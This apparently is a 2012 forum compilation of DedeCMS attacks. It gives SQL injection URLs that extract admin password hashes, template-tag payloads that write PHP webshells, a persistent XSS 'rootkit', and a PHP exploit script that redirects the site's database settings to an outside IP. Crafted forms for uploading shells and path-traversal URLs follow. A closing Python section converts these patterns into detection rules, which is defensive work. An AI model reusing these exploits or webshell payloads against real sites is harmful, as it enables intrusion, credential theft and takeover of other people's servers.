DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line webshell with password xiao.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS (all versions) gotopage parameter XSS vulnerability
1. Copy and paste the URL below into the browser. This triggers the XSS and installs the XSS "rootkit"; note that IE8/9 block URL-based XSS, so their XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Afterwards, visiting either of the URLs below triggers the XSS no matter what.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "\nExploit Success \n";
    if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA value and you are taken straight into the site backend.

This requires the backend path to be known beforehand.

DedeCMS tag remote file write vulnerability
Prerequisite: you must have your own DedeCMS database ready, then insert the row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, log into the member area, publish an article and upload an image; then, in attachment management, replace the image with a crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>

<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if the site reports the edit succeeded, the template path has been changed.
3. Visit the edited article:
Assuming the article just edited has aid 2, simply request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS website management system GetShell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, i.e. a 20-character MD5; from that, drop 3 characters at the front and 1 at the end to get the 16-character MD5.

DedeCMS 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This abuses a MySQL numeric overflow that raises an error, together with DedeCMS logging database errors into a PHP file without validating the file header.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output confirms the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the step 2 output again means the trojan file was uploaded successfully.

DedeCMS plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
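As an added example (not part of the original post), the Python below turns the request patterns collected throughout this post (the _COOKIE[GLOBALS][cfg_*] override, the advancedsearch.php sql= parameter, the rss.php _Cs[] injection, the gotopage XSS, the edit_face.php and carbuyaction.php traversals, templet= outside the template directory, {dede:...} tags in user input, and the UNION SELECT / wide-byte GBK payloads) into detection rules and runs them over constructed request lines. The log-line layout and all sample values are assumptions for the demo, and the payloads are deliberately simplified, non-working stand-ins.

```python
"""Detection rules for the DedeCMS request patterns collected in this post.

Each rule is a regex over the URL-decoded request (path, query string and
any cookie/body text the log collector appended).  The sample requests at
the bottom are constructed for this demo and are not real traffic.
"""
import re
from urllib.parse import unquote_to_bytes

# Rule table: (alert name, pattern).  Names are ours, not DedeCMS terms.
RULES = [
    # _COOKIE[GLOBALS][cfg_*] / _POST[GLOBALS][cfg_*]: pointing cfg_db* at
    # an attacker-controlled database (mytag_js.php, backend login.php)
    ("globals_override",
     re.compile(r"_(?:cookie|post|get|request)\[globals\]\[cfg_", re.I)),
    # plus/advancedsearch.php running a caller-supplied SELECT from sql=
    ("advancedsearch_sql",
     re.compile(r"advancedsearch\.php.*[?&]sql=\s*select\b", re.I)),
    # plus/rss.php _Cs[] array abuse, typically with updatexml() errors
    ("rss_updatexml",
     re.compile(r"rss\.php.*(?:_cs\[|updatexml\s*\()", re.I)),
    # dede/login.php reflecting gotopage= into the page unescaped
    ("gotopage_xss", re.compile(r"gotopage=[^&]*<\s*script", re.I)),
    # member/edit_face.php oldface= with directory traversal (file delete)
    ("edit_face_traversal",
     re.compile(r"edit_face\.php.*oldface=[^&]*\.\./", re.I)),
    # plus/carbuyaction.php code= traversal (local file inclusion)
    ("carbuyaction_lfi",
     re.compile(r"carbuyaction\.php.*[?&]code=[^&]*\.\./", re.I)),
    # article edit with templet= pointing outside the template directory
    ("templet_traversal", re.compile(r"[?&]templet=[^&]*\.\./", re.I)),
    # {dede:...} template tags smuggled into user-supplied fields
    ("template_tag_in_input", re.compile(r"\{/?dede:[a-z0-9_]+", re.I)),
    # classic UNION SELECT (feedback_js.php, infosearch.php payloads)
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # a lone high byte right before a quote: wide-byte (GBK) escape bypass
    ("high_byte_before_quote", re.compile(r"[\x81-\xfe]'")),
]


def decode(raw: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times (payloads are often double-encoded).

    The bytes are mapped through latin-1 so every raw byte stays visible to
    the regexes; that is what lets the wide-byte rule see 0xCF before a quote.
    """
    data = raw.replace("+", " ").encode("utf-8")
    for _ in range(rounds):
        if b"%" not in data:
            break
        data = unquote_to_bytes(data)
    return data.decode("latin-1")


def triage(request_line: str) -> list:
    """Return the names of every rule that matches one request line."""
    decoded = decode(request_line)
    return [name for name, rx in RULES if rx.search(decoded)]


SAMPLE_REQUESTS = [  # constructed for this demo; simplified, non-working payloads
    "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23'][0]=1",
    "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60",
    "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx=%22",
    "POST /plus/mytag_js.php?aid=1 body=doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=db.attacker.example",
    "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif",
    "GET /plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*",
    "GET /plus/view.php?aid=2",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(triage(line) or ["clean"], line[:60])
```

Rules are ordered so that the most specific DedeCMS endpoint checks fire before the generic SQL ones, which is the order the output list follows.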